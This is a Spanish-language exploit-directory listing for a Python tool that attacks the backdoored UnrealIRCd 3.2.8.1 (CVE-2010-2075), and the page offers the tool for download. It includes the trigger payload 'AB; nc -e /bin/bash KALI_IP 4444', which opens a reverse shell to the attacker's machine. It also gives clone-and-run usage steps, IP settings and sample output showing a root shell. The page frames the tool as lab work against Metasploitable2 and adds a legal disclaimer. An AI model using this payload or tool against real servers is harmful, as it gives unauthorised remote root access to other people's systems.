Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2010-2075 — Exploit de puerta trasera de UnrealIRCd 3.2.8.1 — reverse shell vía AB; trigger, construido desde cero en Python usando sockets sin procesar. Sin Metasploit. | Kitploit
Herramientas/GitHubGitHub/rushikesh-a-bhujbal/cve-2010-2075
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónSeguridad de Cadena de SuministroAprendizaje y EducaciónRed Teaming
Desarrollo de Payloads
Labs y Práctica
GitHubrushikesh-a-bhujbal/cve-2010-2075

CVE-2010-2075

Exploit de puerta trasera de UnrealIRCd 3.2.8.1 — reverse shell vía AB; trigger, construido desde cero en Python usando sockets sin procesar. Sin Metasploit.

Ver Repositorio
1hace 10h 36mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2010-2075 — Exploit de puerta trasera en UnrealIRCd 3.2.8.1

Python Platform Target License


Descripción general

UnrealIRCd es un servidor IRC (Internet Relay Chat) de código abierto — un protocolo que permite a los usuarios comunicarse en tiempo real a través de una red, similar a las primeras plataformas de chat.

Entre 2009 y 2010, se descubrió que UnrealIRCd 3.2.8.1 distribuido a través de los mirrors de descarga oficiales había sido comprometido. Un atacante había reemplazado el código fuente legítimo con una versión con puerta trasera que contenía un disparador oculto de ejecución de comandos.

Esto fue un ataque a la cadena de suministro — idéntico en naturaleza a CVE-2011-2523 (vsftpd 2.3.4). El software legítimo fue reemplazado por una versión modificada maliciosamente antes de que los usuarios lo descargaran.


Cómo funciona la puerta trasera

La puerta trasera monitorea todos los datos entrantes en el puerto 6667. Si cualquier entrada comienza con la cadena , todo lo que sigue se pasa — omitiendo por completo toda la lógica IRC, la autenticación y las comprobaciones de registro.

AB;
directamente a system()

El disparador se activa durante la fase de inicialización de la conexión, antes de que el servidor IRC siquiera registre al cliente. No se requiere NICK, ni USER, ni autenticación.

Flujo del ataque:

root@kitploit:~
Attacker (Kali)                    Target (Metasploitable2)
                                   
1. s1 connects to port 6667   
   NICK + USER handshake      →    Server sends full banner
   Read banner, check version  
   Confirm Unreal3.2.8.1      
                                   
2. Open listener on port 4444  
   (waiting for incoming shell)
                                   
3. s2 connects to port 6667   →    AB; nc -e /bin/bash KALI_IP 4444
                               →    system() executes immediately
                               →    netcat spawns bash, connects back
                                   
4. listener.accept()          ←    Incoming root shell connection
   Interactive root shell      

Reverse Shell vs Bind Shell

Este exploit utiliza un reverse shell — el objetivo se conecta de vuelta al atacante, en lugar de que el atacante se conecte a un puerto en el objetivo.

TipoDirecciónUsado en
Bind shellAtacante → ObjetivoCVE-2011-2523 (vsftpd)
Reverse shellObjetivo → AtacanteCVE-2010-2075 (UnrealIRCd)

Los reverse shells omiten las reglas de firewall de entrada — las conexiones salientes desde el objetivo rara vez se bloquean.


Requisitos

  • Python 3.x
  • Sin librerías externas — solo biblioteca estándar
  • netcat instalado en el objetivo (presente por defecto en Metasploitable2)
  • Objetivo: Metasploitable2 ejecutando UnrealIRCd 3.2.8.1

Uso

root@kitploit:~
git clone https://github.com/rushikesh-a-bhujbal/CVE-2010-2075.git
cd exploit-dev/CVE-2010-2075

Edita main.py y establece:

root@kitploit:~
kali_ip = "YOUR_KALI_IP"
target_ip = "TARGET_IP"

Ejecuta:

root@kitploit:~
python3 main.py

Salida de ejemplo:

root@kitploit:~
[+] Vulnerable version confirmed. Proceeding...
[*] Listening on port 4444...
[+] Shell received from ('192.168.15.132', 58280)
> whoami
root
> uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
> pwd
/etc/unreal
> exit

Manejo de errores

EscenarioComportamiento
Puerto 6667 cerradoImprime "Port Closed", sale limpiamente
Versión incorrectaImprime "Not vulnerable", sale limpiamente
El objetivo no devuelve la llamadalistener.accept() espera (añadir timeout si es necesario)
El comando no produce salidarecv() expira silenciosamente, vuelve al prompt

Diferencia clave con CVE-2011-2523

CVE-2011-2523 (vsftpd)CVE-2010-2075 (UnrealIRCd)
ProtocoloFTP (puerto 21)IRC (puerto 6667)
Disparador:) en el nombre de usuarioPrefijo AB; en cualquier entrada
Tipo de shellBind shell (puerto 6200)Reverse shell (puerto del atacante)
Conexiones2 salientes1 saliente + 1 entrante

Probado contra

  • Metasploitable2 (VM intencionalmente vulnerable)
  • UnrealIRCd 3.2.8.1
  • Linux metasploitable 2.6.24-16-server

Aviso legal

Este exploit está desarrollado estrictamente con fines educativos y para investigación de seguridad autorizada únicamente.

Construido y probado exclusivamente contra una máquina virtual Metasploitable2 local en un entorno de laboratorio completamente aislado.

No utilices esto contra ningún sistema que no poseas o para el que no tengas permiso explícito por escrito para probar. El uso no autorizado es ilegal según la Computer Fraud and Abuse Act (CFAA) y leyes equivalentes en todo el mundo.

El autor no acepta ninguna responsabilidad por el mal uso de este código.


Referencias

  • Registro CVE: https://www.cve.org/CVERecord?id=CVE-2010-2075
  • Entrada NVD: https://nvd.nist.gov/vuln/detail/CVE-2010-2075
  • Divulgación original: https://www.exploit-db.com/exploits/13853
  • Metasploitable2: https://sourceforge.net/projects/metasploitable/

Autor

Rushikesh Bhujbal
Security Research & Exploit Development
GitHub

Descargar herramienta